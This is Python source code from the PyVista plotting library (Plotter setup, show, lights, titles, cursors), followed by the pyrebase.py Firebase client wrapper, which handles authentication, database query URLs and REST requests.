# lazy import vtkOBJExporter here as it takes a long time to
# load and is not always used
try:
from vtkmodules.vtkIOExport import vtkOBJExporter
except: # noqa: E722
from vtk import vtkOBJExporter
if not hasattr(self, "ren_win"):
raise RuntimeError("This plotter must still have a render window open.")
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
else:
filename = os.path.abspath(os.path.expanduser(filename))
exporter = vtkOBJExporter()
exporter.SetFilePrefix(filename)
exporter.SetRenderWindow(self.ren_win)
return exporter.Write()
def __del__(self):
"""Delete the plotter."""
# We have to check here if it has the closed attribute as it
# may not exist should the plotter have failed to initialize.
if hasattr(self, '_closed'):
if not self._closed:
self.close()
self.deep_clean()
if hasattr(self, 'renderers'):
del self.renderers
def add_background_image(self, image_path, scale=1, auto_resize=True, as_global=True):
"""Add a background image to a plot.
Parameters
----------
image_path : str
Path to an image file.
scale : float, optional
Scale the image larger or smaller relative to the size of
the window. For example, a scale size of 2 will make the
largest dimension of the image twice as large as the
largest dimension of the render window. Defaults to 1.
auto_resize : bool, optional
Resize the background when the render window changes size.
as_global : bool, optional
When multiple render windows are present, setting
``as_global=False`` will cause the background to only
appear in one window.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> plotter = pyvista.Plotter()
>>> actor = plotter.add_mesh(pyvista.Sphere())
>>> plotter.add_background_image(examples.mapfile)
>>> plotter.show()
"""
if self.renderers.has_active_background_renderer:
raise RuntimeError(
'A background image already exists. '
'Remove it with ``remove_background_image`` '
'before adding one'
)
# Need to change the number of layers to support an additional
# background layer
if not self._has_background_layer:
self.ren_win.SetNumberOfLayers(3)
renderer = self.renderers.add_background_renderer(image_path, scale, as_global)
self.ren_win.AddRenderer(renderer)
# set up autoscaling of the image
if auto_resize: # pragma: no cover
self.iren.add_observer('ModifiedEvent', renderer.resize)
@wraps(Renderers.remove_background_image)
def remove_background_image(self):
"""Wrap ``Renderers.remove_background_image``."""
self.renderers.remove_background_image()
# return the active renderer to the top, otherwise flat background
# will not be rendered
self.renderer.layer = 0
def _on_first_render_request(self, cpos=None):
"""Once an image or render is officially requested, run this routine.
For example on the show call or any screenshot producing code.
"""
# reset camera for the first render unless the camera is set
if self._first_time: # and not self.camera_set:
for renderer in self.renderers:
if not renderer.camera_set and cpos is None:
renderer.camera_position = renderer.get_default_cam_pos()
renderer.ResetCamera()
elif cpos is not None:
renderer.camera_position = cpos
self._first_time = False
def reset_camera_clipping_range(self):
"""Reset camera clipping planes."""
self.renderer.ResetCameraClippingRange()
def add_light(self, light, only_active=False):
"""Add a Light to the scene.
Parameters
----------
light : Light or vtkLight
The light to be added.
only_active : bool, optional
If ``True``, only add the light to the active
renderer. The default is that every renderer adds the
light. To add the light to an arbitrary renderer, see
:func:`pyvista.plotting.renderer.Renderer.add_light`.
Examples
--------
Create a plotter that we initialize with no lights, and add a
cube and a single headlight to it.
>>> import pyvista as pv
>>> plotter = pv.Plotter(lighting='none')
>>> _ = plotter.add_mesh(pv.Cube())
>>> light = pv.Light(color='cyan', light_type='headlight')
>>> plotter.add_light(light)
>>> plotter.show()
"""
renderers = [self.renderer] if only_active else self.renderers
for renderer in renderers:
renderer.add_light(light)
def remove_all_lights(self, only_active=False):
"""Remove all lights from the scene.
Parameters
----------
only_active : bool
If ``True``, only remove lights from the active
renderer. The default is that lights are stripped from
every renderer.
Examples
--------
Create a plotter and remove all lights after initialization.
Note how the mesh rendered is completely flat
>>> import pyvista as pv
>>> plotter = pv.Plotter()
>>> plotter.remove_all_lights()
>>> plotter.renderer.lights
[]
>>> _ = plotter.add_mesh(pv.Sphere(), show_edges=True)
>>> plotter.show()
Note how this differs from a plot with default lighting
>>> pv.Sphere().plot(show_edges=True, lighting=True)
"""
renderers = [self.renderer] if only_active else self.renderers
for renderer in renderers:
renderer.remove_all_lights()
def where_is(self, name):
"""Return the subplot coordinates of a given actor.
Parameters
----------
name : str
Actor's name.
Returns
-------
list(tuple(int))
A list with the subplot coordinates of the actor.
Examples
--------
>>> import pyvista as pv
>>> plotter = pv.Plotter(shape=(2, 2))
>>> plotter.subplot(0, 0)
>>> _ = plotter.add_mesh(pv.Box(), name='box')
>>> plotter.subplot(0, 1)
>>> _ = plotter.add_mesh(pv.Sphere(), name='sphere')
>>> plotter.subplot(1, 0)
>>> _ = plotter.add_mesh(pv.Box(), name='box')
>>> plotter.subplot(1, 1)
>>> _ = plotter.add_mesh(pv.Cone(), name='cone')
>>> plotter.where_is('box')
[(0, 0), (1, 0)]
>>> plotter.show()
"""
places = []
for index in range(len(self.renderers)):
if name in self.renderers[index]._actors:
places.append(tuple(self.renderers.index_to_loc(index)))
return places
class Plotter(BasePlotter):
"""Plotting object to display vtk meshes or numpy arrays.
Parameters
----------
off_screen : bool, optional
Renders off screen when ``True``. Useful for automated
screenshots.
notebook : bool, optional
When ``True``, the resulting plot is placed inline in a jupyter
notebook. Assumes a jupyter console is active. Automatically
enables ``off_screen``.
shape : list or tuple, optional
Number of sub-render windows inside of the main window.
Specify two across with ``shape=(2, 1)`` and a two by two grid
with ``shape=(2, 2)``. By default there is only one render
window. Can also accept a string descriptor as shape. E.g.:
* ``shape="3|1"`` means 3 plots on the left and 1 on the right,
* ``shape="4/2"`` means 4 plots on top and 2 at the bottom.
border : bool, optional
Draw a border around each render window. Default ``False``.
border_color : color_like, optional
Either a string, rgb list, or hex color string. For example:
* ``color='white'``
* ``color='w'``
* ``color=[1.0, 1.0, 1.0]``
* ``color='#FFFFFF'``
window_size : list, optional
Window size in pixels. Defaults to ``[1024, 768]``, unless
set differently in the relevant theme's ``window_size``
property.
multi_samples : int, optional
The number of multi-samples used to mitigate aliasing. 4 is a
good default but 8 will have better results with a potential
impact on performance.
line_smoothing : bool, optional
If ``True``, enable line smoothing.
polygon_smoothing : bool, optional
If ``True``, enable polygon smoothing.
lighting : str, optional
What lighting to set up for the plotter.
Accepted options:
* ``'light kit'``: a vtk Light Kit composed of 5 lights.
* ``'three lights'``: illumination using 3 lights.
* ``'none'``: no light sources at instantiation.
The default is ``'light kit'`` (to be precise, 5 separate
lights that act like a Light Kit).
theme : pyvista.themes.DefaultTheme, optional
Plot-specific theme.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> another_mesh = examples.load_uniform()
>>> plotter = pyvista.Plotter()
>>> actor = plotter.add_mesh(mesh, color='red')
>>> actor = plotter.add_mesh(another_mesh, color='blue')
>>> plotter.show()
"""
last_update_time = 0.0
right_timer_id = -1
def __init__(
self,
off_screen=None,
notebook=None,
shape=(1, 1),
groups=None,
row_weights=None,
col_weights=None,
border=None,
border_color='k',
border_width=2.0,
window_size=None,
multi_samples=None,
line_smoothing=False,
point_smoothing=False,
polygon_smoothing=False,
splitting_position=None,
title=None,
lighting='light kit',
theme=None,
):
"""Initialize a vtk plotting object."""
super().__init__(
shape=shape,
border=border,
border_color=border_color,
border_width=border_width,
groups=groups,
row_weights=row_weights,
col_weights=col_weights,
splitting_position=splitting_position,
title=title,
lighting=lighting,
theme=theme,
)
log.debug('Plotter init start')
# check if a plotting backend is enabled
_warn_xserver()
def on_timer(iren, event_id):
"""Exit application if interactive renderer stops."""
if event_id == 'TimerEvent' and self.iren._style != "Context":
self.iren.terminate_app()
if off_screen is None:
off_screen = pyvista.OFF_SCREEN
if notebook is None:
if self._theme.notebook is not None:
notebook = self._theme.notebook
else:
notebook = scooby.in_ipykernel()
self.notebook = notebook
if self.notebook:
off_screen = True
self.off_screen = off_screen
self._window_size_unset = False
if window_size is None:
self._window_size_unset = True
window_size = self._theme.window_size
self.__prior_window_size = window_size
if multi_samples is None:
multi_samples = self._theme.multi_samples
# initialize render window
self.ren_win = _vtk.vtkRenderWindow()
self.ren_win.SetMultiSamples(multi_samples)
self.ren_win.SetBorders(True)
if line_smoothing:
self.ren_win.LineSmoothingOn()
if point_smoothing:
self.ren_win.PointSmoothingOn()
if polygon_smoothing:
self.ren_win.PolygonSmoothingOn()
for renderer in self.renderers:
self.ren_win.AddRenderer(renderer)
# Add the shadow renderer to allow us to capture interactions within
# a given viewport
# https://vtk.org/pipermail/vtkusers/2018-June/102030.html
number_of_layers = self.ren_win.GetNumberOfLayers()
current_layer = self.renderer.GetLayer()
self.ren_win.SetNumberOfLayers(number_of_layers + 1)
self.ren_win.AddRenderer(self.renderers.shadow_renderer)
self.renderers.shadow_renderer.SetLayer(current_layer + 1)
self.renderers.shadow_renderer.SetInteractive(False) # never needs to capture
if self.off_screen:
self.ren_win.SetOffScreenRendering(1)
# vtkGenericRenderWindowInteractor has no event loop and
# allows the display client to close on Linux when
# off_screen. We still want an interactor for off screen
# plotting since there are some widgets (like the axes
# widget) that need an interactor
interactor = _vtk.vtkGenericRenderWindowInteractor()
else:
interactor = None
# Add ren win and interactor
self.iren = RenderWindowInteractor(self, light_follow_camera=False, interactor=interactor)
self.iren.set_render_window(self.ren_win)
self.enable_trackball_style() # internally calls update_style()
self.iren.add_observer("KeyPressEvent", self.key_press_event)
# Set camera widget based on theme. This requires that an
# interactor be present.
if self.theme._enable_camera_orientation_widget:
self.add_camera_orientation_widget()
# Set background
self.set_background(self._theme.background)
# Set window size
self.window_size = window_size
# add timer event if interactive render exists
self.iren.add_observer(_vtk.vtkCommand.TimerEvent, on_timer)
if self._theme.depth_peeling.enabled:
if self.enable_depth_peeling():
for renderer in self.renderers:
renderer.enable_depth_peeling()
log.debug('Plotter init stop')
def show(
self,
title=None,
window_size=None,
interactive=True,
auto_close=None,
interactive_update=False,
full_screen=None,
screenshot=False,
return_img=False,
cpos=None,
use_ipyvtk=None,
jupyter_backend=None,
return_viewer=False,
return_cpos=None,
**kwargs,
):
"""Display the plotting window.
Parameters
----------
title : str, optional
Title of plotting window. Defaults to
:attr:`pyvista.global_theme.title <pyvista.themes.DefaultTheme.title>`.
window_size : list, optional
Window size in pixels. Defaults to
:attr:`pyvista.global_theme.window_size <pyvista.themes.DefaultTheme.window_size>`.
interactive : bool, optional
Enabled by default. Allows user to pan and move figure.
Defaults to
:attr:`pyvista.global_theme.interactive <pyvista.themes.DefaultTheme.interactive>`.
auto_close : bool, optional
Exits plotting session when user closes the window when
interactive is ``True``. Defaults to
:attr:`pyvista.global_theme.auto_close <pyvista.themes.DefaultTheme.auto_close>`.
interactive_update : bool, optional
Disabled by default. Allows the user to draw without blocking;
the user should call :func:`BasePlotter.update` in each iteration.
full_screen : bool, optional
Opens window in full screen. When enabled, ignores
``window_size``. Defaults to
:attr:`pyvista.global_theme.full_screen <pyvista.themes.DefaultTheme.full_screen>`.
screenshot : str, pathlib.Path, BytesIO or bool, optional
Take a screenshot of the initial state of the plot.
If a string, it specifies the path to which the screenshot
is saved. If ``True``, the screenshot is returned as an
array. Defaults to ``False``. For interactive screenshots
it's recommended to first call ``show()`` with
``auto_close=False`` to set the scene, then save the
screenshot in a separate call to ``show()`` or
:func:`Plotter.screenshot`.
return_img : bool
Returns a numpy array representing the last image along
with the camera position.
cpos : list(tuple(floats))
The camera position. You can also set this with
:attr:`Plotter.camera_position`.
use_ipyvtk : bool, optional
Deprecated. Instead, set the backend either globally with
``pyvista.set_jupyter_backend('ipyvtklink')`` or with
``backend='ipyvtklink'``.
jupyter_backend : str, optional
Jupyter notebook plotting backend to use. One of the
following:
* ``'none'`` : Do not display in the notebook.
* ``'pythreejs'`` : Show a ``pythreejs`` widget
* ``'static'`` : Display a static figure.
* ``'ipygany'`` : Show a ``ipygany`` widget
* ``'panel'`` : Show a ``panel`` widget.
This can also be set globally with
:func:`pyvista.set_jupyter_backend`.
return_viewer : bool, optional
Return the jupyterlab viewer, scene, or display object
when plotting with jupyter notebook.
return_cpos : bool, optional
Return the last camera position from the render window
when enabled. Default based on theme setting. See
:attr:`pyvista.themes.DefaultTheme.return_cpos`.
**kwargs : dict, optional
Developer keyword arguments.
Returns
-------
cpos : list
List of camera position, focal point, and view up.
Returned only when ``return_cpos=True`` or set in the
default global or plot theme. Not returned when in a
jupyter notebook and ``return_viewer=True``.
image : np.ndarray
Numpy array of the last image when either ``return_img=True``
or ``screenshot=True`` is set. Not returned when in a
jupyter notebook with ``return_viewer=True``. Optionally
contains alpha values. Sized:
* [Window height x Window width x 3] if the theme sets
``transparent_background=False``.
* [Window height x Window width x 4] if the theme sets
``transparent_background=True``.
widget
IPython widget when ``return_viewer=True``.
Notes
-----
Please use the ``q``-key to close the plotter as some
operating systems (namely Windows) will experience issues
saving a screenshot if the exit button in the GUI is pressed.
Examples
--------
Simply show the plot of a mesh.
>>> import pyvista as pv
>>> pl = pv.Plotter()
>>> _ = pl.add_mesh(pv.Cube())
>>> pl.show()
Take a screenshot interactively. Screenshot will be of the
first image shown, so use the first call with
``auto_close=False`` to set the scene before taking the
screenshot.
>>> pl = pv.Plotter()
>>> _ = pl.add_mesh(pv.Cube())
>>> pl.show(auto_close=False) # doctest:+SKIP
>>> pl.show(screenshot='my_image.png') # doctest:+SKIP
Display a ``pythreejs`` scene within a jupyter notebook
>>> pl.show(jupyter_backend='pythreejs') # doctest:+SKIP
Return a ``pythreejs`` scene.
>>> pl.show(jupyter_backend='pythreejs', return_viewer=True) # doctest:+SKIP
Obtain the camera position when using ``show``.
>>> pl = pv.Plotter()
>>> _ = pl.add_mesh(pv.Sphere())
>>> pl.show(return_cpos=True) # doctest:+SKIP
[(2.223005211686484, -0.3126909484828709, 2.4686209867735065),
(0.0, 0.0, 0.0),
(-0.6839951597283509, -0.47207319712073137, 0.5561452310578585)]
"""
# developer keyword argument: runs a function immediately prior to ``close``
self._before_close_callback = kwargs.pop('before_close_callback', None)
jupyter_kwargs = kwargs.pop('jupyter_kwargs', {})
assert_empty_kwargs(**kwargs)
if interactive_update and auto_close is None:
auto_close = False
elif interactive_update and auto_close:
warnings.warn(
textwrap.dedent(
"""
The plotter will close immediately automatically since ``auto_close=True``.
Either, do not specify ``auto_close``, or set it to ``False`` if you want to
interact with the plotter interactively.
"""
).strip()
)
elif auto_close is None:
auto_close = self._theme.auto_close
if use_ipyvtk:
txt = textwrap.dedent(
"""
use_ipyvtk is deprecated. Set the backend
globally with ``pyvista.set_jupyter_backend("ipyvtklink")
or with ``backend="ipyvtklink"``
"""
).strip()
from pyvista.core.errors import DeprecationError
raise DeprecationError(txt)
if not hasattr(self, "ren_win"):
raise RuntimeError("This plotter has been closed and cannot be shown.")
if full_screen is None:
full_screen = self._theme.full_screen
if full_screen:
self.ren_win.SetFullScreen(True)
self.ren_win.BordersOn() # super buggy when disabled
else:
if window_size is None:
window_size = self.window_size
else:
self._window_size_unset = False
self.ren_win.SetSize(window_size[0], window_size[1])
# reset camera for the first render unless the camera is set
self._on_first_render_request(cpos)
# handle plotter notebook
if jupyter_backend and not self.notebook:
warnings.warn(
'Not within a jupyter notebook environment.\nIgnoring ``jupyter_backend``.'
)
if self.notebook:
from ..jupyter.notebook import handle_plotter
if jupyter_backend is None:
jupyter_backend = self._theme.jupyter_backend
if jupyter_backend != 'none':
disp = handle_plotter(
self, backend=jupyter_backend, return_viewer=return_viewer, **jupyter_kwargs
)
return disp
self.render()
# This has to be after the first render for some reason
if title is None:
title = self.title
if title:
self.ren_win.SetWindowName(title)
self.title = title
# Keep track of image for sphinx-gallery
if pyvista.BUILDING_GALLERY or screenshot:
# always save screenshots for sphinx_gallery
self.last_image = self.screenshot(screenshot, return_img=True)
self.last_image_depth = self.get_image_depth()
# See: https://github.com/pyvista/pyvista/issues/186#issuecomment-550993270
if interactive and not self.off_screen:
try: # interrupts will be caught here
log.debug('Starting iren')
self.iren.update_style()
if not interactive_update:
# Resolves #1260
if os.name == 'nt':
if _vtk.VTK9:
self.iren.process_events()
else:
global VERY_FIRST_RENDER
if not VERY_FIRST_RENDER:
self.iren.start()
VERY_FIRST_RENDER = False
self.iren.start()
self.iren.initialize()
except KeyboardInterrupt:
log.debug('KeyboardInterrupt')
self.close()
raise KeyboardInterrupt
# In the event that the user hits the exit-button on the GUI (on
# Windows OS) then it must be finalized and deleted as accessing it
# will kill the kernel.
# Here we check for that and clean it up before moving on to any of
# the closing routines that might try to still access that
# render window.
if not self.ren_win.IsCurrent():
self._clear_ren_win() # The ren_win is deleted
# proper screenshots cannot be saved if this happens
if not auto_close:
warnings.warn(
"`auto_close` ignored: by clicking the exit button, "
"you have destroyed the render window and we have to "
"close it out."
)
auto_close = True
# NOTE: after this point, nothing from the render window can be accessed
# because if a user pressed the close button, it destroys the
# render view and a stream of errors will kill the Python
# kernel if code here tries to access that renderer.
# See issues #135 and #186 for insight before editing the
# remainder of this function.
# Close the render window if requested
if auto_close:
self.close()
# If user asked for screenshot, return as numpy array after camera
# position
if return_img or screenshot is True:
if return_cpos:
return self.camera_position, self.last_image
if return_cpos:
return self.camera_position
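# Note on the return contract implemented above: when ``return_cpos=True``
# the camera position is returned, paired with the last rendered image if
# ``return_img=True`` or ``screenshot`` is literally ``True`` (a boolean,
# not a file path); otherwise nothing is returned.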
def add_title(self, title, font_size=18, color=None, font=None, shadow=False):
"""Add text to the top center of the plot.
This is merely a convenience method that calls ``add_text``
with ``position='upper_edge'``.
Parameters
----------
title : str
The text to add to the rendering.
font_size : float, optional
Sets the size of the title font. Defaults to 18 or the
value of the global theme if set.
color : color_like, optional
Either a string, rgb list, or hex color string. Defaults
to white or the value of the global theme if set. For
example:
* ``color='white'``
* ``color='w'``
* ``color=[1.0, 1.0, 1.0]``
* ``color='#FFFFFF'``
font : str, optional
Font name may be ``'courier'``, ``'times'``, or ``'arial'``.
shadow : bool, optional
Adds a black shadow to the text. Defaults to ``False``.
Returns
-------
vtk.vtkTextActor
Text actor added to plot.
Examples
--------
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> pl.background_color = 'grey'
>>> actor = pl.add_title('Plot Title', font='courier', color='k',
... font_size=40)
>>> pl.show()
"""
# add additional spacing from the top of the figure by default
title = '\n' + title
return self.add_text(
title,
position='upper_edge',
font_size=font_size,
color=color,
font=font,
shadow=shadow,
name='title',
viewport=False,
)
def add_cursor(
self,
bounds=(-1.0, 1.0, -1.0, 1.0, -1.0, 1.0),
focal_point=(0.0, 0.0, 0.0),
color=None,
):
"""Add a cursor of a PyVista or VTK dataset to the scene.
Parameters
----------
bounds : length 6 sequence
Specify the bounds in the format of:
- ``(xmin, xmax, ymin, ymax, zmin, zmax)``
Defaults to ``(-1.0, 1.0, -1.0, 1.0, -1.0, 1.0)``.
focal_point : list or tuple, optional
The focal point of the cursor.
Defaults to ``(0.0, 0.0, 0.0)``.
color : color_like, optional
Either a string, RGB sequence, or hex color string. For
example:
* ``color='white'``
* ``color='w'``
* ``color=[1.0, 1.0, 1.0]``
* ``color='#FFFFFF'``
Returns
-------
vtk.vtkActor
VTK actor of the 2D cursor.
Examples
--------
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(sphere)
>>> _ = plotter.add_cursor()
>>> plotter.show()
"""
alg = _vtk.vtkCursor3D()
alg.SetModelBounds(bounds)
alg.SetFocalPoint(focal_point)
alg.AllOn()
mapper = make_mapper(_vtk.vtkDataSetMapper)
mapper.SetInputConnection(alg.GetOutputPort())
actor, prop = self.add_actor(mapper)
prop.SetColor(Color(color).float_rgb)
return actor
# Tracks created plotters. At the end of the file as we need to
# define ``BasePlotter`` before including it in the type definition.
_ALL_PLOTTERS: Dict[str, BasePlotter] = {}
def _kill_display(disp_id): # pragma: no cover
"""Forcibly close the display on Linux.
See: https://gitlab.kitware.com/vtk/vtk/-/issues/17917#note_783584
And more details into why...
https://stackoverflow.com/questions/64811503
Notes
-----
This is to be used experimentally and is known to cause issues
with ``pyvistaqt``.
"""
if platform.system() != 'Linux':
raise OSError('This method only works on Linux')
if disp_id:
cdisp_id = int(disp_id[1:].split('_')[0], 16)
# this is unsafe as events might be queued, but sometimes the
# window fails to close if we don't just close it
Thread(target=X11.XCloseDisplay, args=(cdisp_id,)).start()
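# A minimal usage sketch (hypothetical id string), assuming the
# underscore-delimited hex form parsed above, e.g. as reported by VTK for
# an X11 display:
#
#     if platform.system() == 'Linux':
#         _kill_display('_7fb4c0000000_p_void')  # hypothetical display id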
|
pyrebase.py
|
import requests
from requests import Session
from requests.exceptions import HTTPError
try:
from urllib.parse import urlencode, quote
except ImportError:
from urllib import urlencode, quote
import json
import math
from random import uniform
import time
from collections import OrderedDict
from sseclient import SSEClient
import threading
import socket
from oauth2client.service_account import ServiceAccountCredentials
from requests.packages.urllib3.contrib.appengine import is_appengine_sandbox
from requests_toolbelt.adapters import appengine
import certifi
try:
import python_jwt as jwt
except ImportError:
jwt = None
try:
from Crypto.PublicKey import RSA
except ImportError:
RSA = None
import datetime
from .util import retry
NUM_RETRIES = 3
POOL_SIZE = 100
def initialize_app(config):
if 'projectId' in config.keys():
projectId = config['projectId']
if 'authDomain' in config.keys():
config['authDomain'] = config['authDomain'].format(projectId)
if 'databaseURL' in config.keys():
config['databaseURL'] = config['databaseURL'].format(projectId)
if 'storageBucket' in config.keys():
config['storageBucket'] = config['storageBucket'].format(projectId)
return Firebase(config)
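# A minimal usage sketch (hypothetical values) using the config keys read
# below in Firebase.__init__; the '{0}' placeholders are filled in from
# 'projectId' by the format() calls above:
#
#     config = {
#         "apiKey": "...",
#         "authDomain": "{0}.firebaseapp.com",
#         "databaseURL": "https://{0}.firebaseio.com",
#         "storageBucket": "{0}.appspot.com",
#         "projectId": "my-project",  # hypothetical project id
#     }
#     firebase = initialize_app(config)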
class Firebase:
""" Firebase Interface """
def __init__(self, config):
self.api_key = config.get("apiKey")
self.auth_domain = config.get("authDomain")
self.database_url = config.get("databaseURL")
self.storage_bucket = config.get("storageBucket")
self.credentials = None
self.requests = requests.Session()
if config.get("serviceAccount"):
scopes = [
'https://www.googleapis.com/auth/firebase.database',
'https://www.googleapis.com/auth/userinfo.email',
"https://www.googleapis.com/auth/cloud-platform"
]
service_account_type = type(config["serviceAccount"])
if service_account_type is str:
self.credentials = ServiceAccountCredentials\
.from_json_keyfile_name(
config["serviceAccount"], scopes)
if service_account_type is dict:
self.credentials = ServiceAccountCredentials \
.from_json_keyfile_dict(
config["serviceAccount"], scopes)
if is_appengine_sandbox():
# Fix error in standard GAE environment;
# related to
# https://github.com/kennethreitz/requests/issues/3187
# ProtocolError('Connection aborted.',
# error(13, 'Permission denied'))
adapter = appengine.AppEngineAdapter(
pool_connections=POOL_SIZE,
pool_maxsize=POOL_SIZE,
max_retries=NUM_RETRIES)
else:
adapter = requests.adapters.HTTPAdapter(
pool_connections=POOL_SIZE,
pool_maxsize=POOL_SIZE,
max_retries=NUM_RETRIES)
for scheme in ('http://', 'https://'):
self.requests.mount(scheme, adapter)
def auth(self):
return Auth(self.api_key, self.requests, self.credentials)
def database(self):
return Database(
self.credentials,
self.api_key,
self.database_url,
self.requests)
def storage(self):
return Storage(self.credentials, self.storage_bucket, self.requests)
class Auth:
""" Authentication Service """
def __init__(self, api_key, requests, credentials):
self.api_key = api_key
self.current_user = None
self.requests = requests
self.credentials = credentials
def sign_in_with_email_and_password(self, email, password):
request_ref = ("https://www.googleapis.com/identitytoolkit" +
"/v3/relyingparty/verifyPassword?key={0}").format(
self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps(
{"email": email, "password": password, "returnSecureToken": True})
request_object = requests.post(
request_ref,
headers=headers,
data=data,
verify=certifi.old_where())
raise_detailed_error(request_object)
self.current_user = request_object.json()
return request_object.json()
def create_custom_token(self, uid, additional_claims=None):
service_account_email = self.credentials.service_account_email
private_key = RSA.importKey(self.credentials._private_key_pkcs8_pem)
payload = {
"iss": service_account_email,
"sub": service_account_email,
"aud": "https://identitytoolkit.googleapis.com/" +
"google.identity.identitytoolkit.v1.IdentityToolkit",
"uid": uid}
if additional_claims:
payload["claims"] = additional_claims
exp = datetime.timedelta(minutes=60)
return jwt.generate_jwt(payload, private_key, "RS256", exp)
def sign_in_with_custom_token(self, token):
request_ref = ("https://www.googleapis.com/identitytoolkit" +
"/v3/relyingparty/verifyCustomToken?key={0}").format(
self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"returnSecureToken": True, "token": token})
request_object = requests.post(
request_ref,
headers=headers,
data=data,
verify=certifi.old_where())
raise_detailed_error(request_object)
return request_object.json()
def refresh(self, refresh_token):
request_ref = "https://securetoken.googleapis.com/v1/token?key={0}" \
.format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"grantType": "refresh_token",
"refreshToken": refresh_token})
request_object = requests.post(
request_ref,
headers=headers,
data=data,
verify=certifi.old_where())
raise_detailed_error(request_object)
request_object_json = request_object.json()
# handle weirdly formatted response
user = {
"userId": request_object_json["user_id"],
"idToken": request_object_json["id_token"],
"refreshToken": request_object_json["refresh_token"]
}
return user
def get_account_info(self, id_token):
request_ref = ("https://www.googleapis.com/identitytoolkit/" +
"v3/relyingparty/getAccountInfo?key={0}") \
.format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"idToken": id_token})
request_object = requests.post(
request_ref,
headers=headers,
data=data,
verify=certifi.old_where())
raise_detailed_error(request_object)
return request_object.json()
def send_email_verification(self, id_token):
request_ref = "https://www.googleapis.com/identitytoolkit/" + \
"v3/relyingparty/getOobConfirmationCode?key={0}" \
.format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"requestType": "VERIFY_EMAIL", "idToken": id_token})
request_object = requests.post(
request_ref,
headers=headers,
data=data,
verify=certifi.old_where())
raise_detailed_error(request_object)
return request_object.json()
def send_password_reset_email(self, email):
request_ref = "https://www.googleapis.com/identitytoolkit/" + \
"v3/relyingparty/getOobConfirmationCode?key={0}" \
.format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"requestType": "PASSWORD_RESET", "email": email})
request_object = requests.post(
request_ref,
headers=headers,
data=data,
verify=certifi.old_where())
raise_detailed_error(request_object)
return request_object.json()
def verify_password_reset_code(self, reset_code, new_password):
request_ref = "https://www.googleapis.com/identitytoolkit" + \
"/v3/relyingparty/resetPassword?key={0}" \
.format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"oobCode": reset_code, "newPassword": new_password})
request_object = requests.post(
request_ref,
headers=headers,
data=data,
verify=certifi.old_where())
raise_detailed_error(request_object)
return request_object.json()
def create_user_with_email_and_password(self, email, password):
request_ref = "https://www.googleapis.com/identitytoolkit/" + \
"v3/relyingparty/signupNewUser?key={0}" \
.format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps(
{"email": email, "password": password, "returnSecureToken": True})
request_object = requests.post(
request_ref,
headers=headers,
data=data,
verify=certifi.old_where())
raise_detailed_error(request_object)
return request_object.json()
class Database:
""" Database Service """
def __init__(self, credentials, api_key, database_url, requests):
if not database_url.endswith('/'):
url = ''.join([database_url, '/'])
else:
url = database_url
self.credentials = credentials
self.api_key = api_key
self.database_url = url
self.requests = requests
self.path = ""
self.build_query = {}
self.last_push_time = 0
self.last_rand_chars = []
def order_by_key(self):
self.build_query["orderBy"] = "$key"
return self
def order_by_value(self):
self.build_query["orderBy"] = "$value"
return self
def order_by_child(self, order):
self.build_query["orderBy"] = order
return self
def start_at(self, start):
self.build_query["startAt"] = start
return self
def end_at(self, end):
self.build_query["endAt"] = end
return self
def equal_to(self, equal):
self.build_query["equalTo"] = equal
return self
def limit_to_first(self, limit_first):
self.build_query["limitToFirst"] = limit_first
return self
def limit_to_last(self, limit_last):
self.build_query["limitToLast"] = limit_last
return self
def shallow(self):
self.build_query["shallow"] = True
return self
def child(self, *args):
new_path = "/".join([str(arg) for arg in args])
if self.path:
self.path += "/{}".format(new_path)
else:
if new_path.startswith("/"):
new_path = new_path[1:]
self.path = new_path
return self
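# Path-building sketch: db.child("users").child("alice", "profile")
# accumulates self.path == "users/alice/profile"; a leading "/" is only
# stripped from the first segment.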
def build_request_url(self, token, shallow=False):
parameters = {}
if token:
parameters['auth'] = token
if shallow:
parameters['shallow'] = 'true'
for param in list(self.build_query):
if isinstance(self.build_query[param], str):
parameters[param] = quote('"' + self.build_query[param] + '"')
elif isinstance(self.build_query[param], bool):
parameters[param] = "true" if self.build_query[param] \
else "false"
else:
parameters[param] = self.build_query[param]
# reset path and build_query for next query
request_ref = '{0}{1}.json?{2}'.format(
self.database_url, self.path, urlencode(parameters))
self.path = ""
self.build_query = {}
return request_ref
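# Sketch of the resulting URL (hypothetical database host): a chained query
# such as db.child("users").order_by_child("age").limit_to_first(3).get()
# produces a request of the form
#     https://<db-host>/users.json?orderBy=...&limitToFirst=3
# where string parameters are quoted by the loop above; note that the path
# and query builder are reset here, so each chain is single-use.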
def build_headers(self, token=None):
headers = {"content-type": "application/json; charset=UTF-8"}
if not token and self.credentials:
access_token = self.credentials.get_access_token().access_token
headers['Authorization'] = 'Bearer ' + access_token
return headers
def get(self, token=None, json_kwargs={}, shallow=False):
build_query = self.build_query
query_key = self.path.split("/")[-1]
request_ref = self.build_request_url(token, shallow=shallow)
# headers
headers = self.build_headers(token)
# do request
request_object = self.requests.get(request_ref, headers=headers)
raise_detailed_error(request_object)
request_dict = request_object.json(**json_kwargs)
# if primitive or simple query return
if isinstance(request_dict, list):
return PyreResponse(convert_list_to_pyre(request_dict), query_key)
if not isinstance(request_dict, dict):
return PyreResponse(request_dict, query_key)
if not build_query:
return PyreResponse(
convert_to_pyre(
request_dict.items()),
query_key)
# return keys if shallow
if build_query.get("shallow"):
return PyreResponse(request_dict.keys(), query_key)
# otherwise sort
sorted_response = None
if build_query.get("orderBy"):
if build_query["orderBy"] == "$key":
sorted_response = sorted(
request_dict.items(), key=lambda item: item[0])
elif build_query["orderBy"] == "$value":
